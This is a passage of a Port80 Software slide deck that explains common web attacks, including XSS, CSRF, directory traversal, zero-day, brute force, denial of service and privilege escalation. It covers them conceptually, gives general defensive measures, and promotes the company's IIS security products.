  • 21. Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) Some XSS attacks can be tracked to DOM-based or local cross-site script vulnerabilities within a page's client-side script itself, often called non-persistent or reflected XSS vulnerabilities. When data provided by a Web user is used immediately by server-side scripts to generate a page of results for that user, and if unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page.
  • 22. Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) If an attacker could convince a user to follow a malicious URL which injects code into the results page, the attacker gets full access to that page's content, where many other traps can be laid for the user: like false search engine or database search results displaying hacker-designed and -controlled URLs). Port80 Solutions:   ServerDefender AI ,  ServerDefender VP
  • 23. Cross-Site Request Forgery Attacks Why you need a Web App Firewall (and more) Seriously, don't become a vector for indirect attacks on other sites or your visitors.   Cross-site request forgery (CSRF or XSRF), also known as a one click attack or session riding, is an exploit very similar to an XXS attack. Rather than an attacker injecting unauthorized code into a Web site, a cross-site request forgery attack only transmits unauthorized commands from a user that the Web site or application considers to be authenticated.
  • 24. Cross-Site Request Forgery Attacks, cont. Why you need a Web App Firewall (and more) At risk are Web sites and applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action. These attacks are characteristic vulnerabilities of Ajax-based applications that make use of the XMLHttpRequest (XHR) API. A user that is authenticated by a cookie saved in his Web browser could unknowingly send an HTTP request to a site that trusts him and thereby cause an unwanted action (for instance, withdrawing funds from a bank account).
  • 25. Cross-Site Request Forgery Attacks, cont. Why you need a Web App Firewall (and more) These types of attacks are very common on Internet forums, where users are allowed to post images but not JavaScript. To combat this, URLs can be sessionized by implementing a transient authentication mechanism (such as a constantly-changing, hidden form field value) in place of persistent, cookie-based, or HTTP authentication. A simpler approach, requiring far less code rewriting, is to check that the referer in the request is from an authorized, on-site page. This can be spoofed, however, and so should not be relied upon exclusively.
  • 26. Cross-Site Request Forgery Attacks, cont. Why you need a Web App Firewall (and more) For Ajax scenarios in particular, a modestly costly method for combating CSRF attacks is to require the double submission of any cookies that are used for authentication -- essentially by reading the authentication token from the cookie on the client side using JavaScript, submitting it separately with the GET or POST, and then validating it along with the cookie itself. Cookie encryption or signing also helps to defeat these attacks. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP ,  LinkDeny (weak protection)
  • 27. Directory Traversal Attacks Why you need a Web App Firewall (and more) /admin, /scripts, /noaccess, /etc.   If you can get to a file via a URL, an attacker can get to it as well, even if the link is not publicly displayed on your Web site. Also known as ../ (dot dot slash), directory climbing, backtracking, and sometimes a canonicalization attack, a directory traversal attack exploits insufficient security validation and sanitization of user-supplied URL paths in Web site and application requests.
  • 28. Directory Traversal Attacks, cont. Why you need a Web App Firewall (and more) This type of attack does not mean a coding deficiency, but rather a lack of security and authentication for all Web resources on a site or application. Microsoft Windows or DOS directory traversal uses the ..\ characters, although many Windows programs or APIs also accept UNIX-like directory traversal characters (../), but at least most directory vulnerabilities on Windows are limited to a single partition (C://, etc.).
  • 29. Directory Traversal Attacks, cont. Why you need a Web App Firewall (and more) Though IIS can handle simple cases of directory traversal attacks, this is just a start. You need to stop requests to seemingly non-existent Web resources, sanitize inputs from all odd or non-standard character encodings, ensure document roots are known and string lengths are consistent, and also confirm that no files outside the document root of the site can be served. Of course, the best response to a directory traversal request (the only one that does not give any clues to the attacker) is a good old 404 HTTP response. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP .
  • 30. Zero Day Attacks Why you need a Web App Firewall (and more) Protect against attacks before the patch and after the patch.   A zero-day (or zero-hour) attack is not so much a specific type of attack as it is a special case of all other types. A zero-day attack is one that exposes heretofore undisclosed or unpatched computer application vulnerabilities.
  • 31. Zero Day Attacks, cont. Why you need a Web App Firewall (and more) Zero-day attacks take advantage of Web security holes for which no solution is currently available. 0-day exploits are released before or on the same day that the vulnerability is discovered or announced, sometimes even on the day that the vendor patch is released to the public. The term derives from the number of days between the public advisory and the release of the exploit. The name itself is an indication of the vendor patch being available, i.e. the vulnerability affected unpatched systems for zero days.
  • 32. Zero Day Attacks, cont. Why you need a Web App Firewall (and more) As new attacks are introduced to IIS and application server code that often fall in the category of some of the other attacks discussed here, it is vital to have a general purpose Web application firewall covering the bases to protect the site or app from that attack vector before the platform patches can be applied. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP .
  • 33. Brute Force Attacks Why you need a Web App Firewall (and more) A, B, C, D, Admin Access...   A brute force attack, sometimes called a dictionary attack, is a method of defeating a cryptographic authentication/authorization scheme by trying a large number of possible answers. The best example is exhaustively working through all possible keys in order to discover a password combination.
  • 34. Brute Force Attacks, cont. Why you need a Web App Firewall (and more) Like a zero day attack, brute force attacks are often used to find open, unprotected directories or to break authentication and authorization layers. Effective request throttling, tracking and limiting the frequency of Web requests per second to a particular login file or directory, often defeats this form of automated attack. Port80 Solutions:   ServerDefender AI
  • 35. Denial-of-Service Attack Why you need a Web App Firewall (and more) Too much traffic can be deadly for any Web site.   A denial-of-service attack (DoS) is an attempt to make a Web server resource unavailable to its intended users. Although there are many ways to accomplish such an attack, it generally comprises the concerted, malevolent efforts of hackers to prevent an Internet site or application from functioning efficiently or at all, temporarily or indefinitely, by flooding the site or app with an unusually high amount of Web requests, including requests that tie up resources by inducing error states.
  • 36. Denial-of-Service Attack, cont. Why you need a Web App Firewall (and more) This, in turn, forces the targeted Web server to reset or consume its resources such that it can no longer serve legitimate requests. Like a brute force attack, being able to identify and block IP addresses with a high frequency of requests can stop these attacks before site resources are used up, keeping legitimate Web users in service.
  • 37. Privilege Escalation Attacks Why you need a Web App Firewall (and more) Control is the ultimate goal of all attackers.   At the end of the day, almost every Web attack is an attempt to escalate privileges and gain remote control over your Web sites, apps, data and user communities. Privilege escalation is the act of exploiting a bug in an application to gain access to resources which normally would have been protected from an application or user with lower privileges.
  • 38. Privilege Escalation Attacks, cont. Why you need a Web App Firewall (and more) The result is that the Web application performs actions with a higher security context that were intended for Web developers or system administrators. Buffer overflows, XSS, and CSRF are all examples of such privilege escalation attacks. Most hacks focus on getting admin privileges on the target Web site and can involve unauthorized access leading to printer protocol and remote data services attacks, even access to run the command line with administrator or the application's privileges itself. At that point, your Web server is now the attacker's Web server, and they will quickly look to attack the rest of your network from that beachhead. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP .
  • 39. Defense-in-Depth Works Why you need a Web App Firewall (and more) How do you avoid being fully hacked? In general, it goes without saying that you should protect your ports and network with a standard hardware firewall, keep patching your OS, Web, app, and DB layers, authenticate secure sections of the site, and learn as much as possible about the security options in your code development on ASP, ASP.NET, ColdFusion, PHP, JSP, or other type of Web-based application.
  • 40. Defense-in-Depth Works, cont. Why you need a Web App Firewall (and more) By additionally layering in Port80 Software's security solutions , you will augment these systems to directly protect your Microsoft IIS Web server, Web apps, and data from the bad guys out there on the Internet.
  • 41. About Port80 Software Web Server Technologies | Part I: HTTP & Getting Started Solutions for Microsoft IIS Web Servers Port80 software exposes control to server-side functionality for developers, and streamlines tasks for administrators: Increase security by locking down what info you broadcast and blocking intruders with ServerMask and ServerDefender Protect your intellectual property by preventing hotlinking with LinkDeny Improve performance : compress pages and manage cache controls for faster load time and bandwidth savings with CacheRight, httpZip, and ZipEnable Upgrade Web development tools : Negotiate content based on device, language, or other parameters with PageXchanger, and tighten code with w3compiler. Visit us online @ www.port80software.com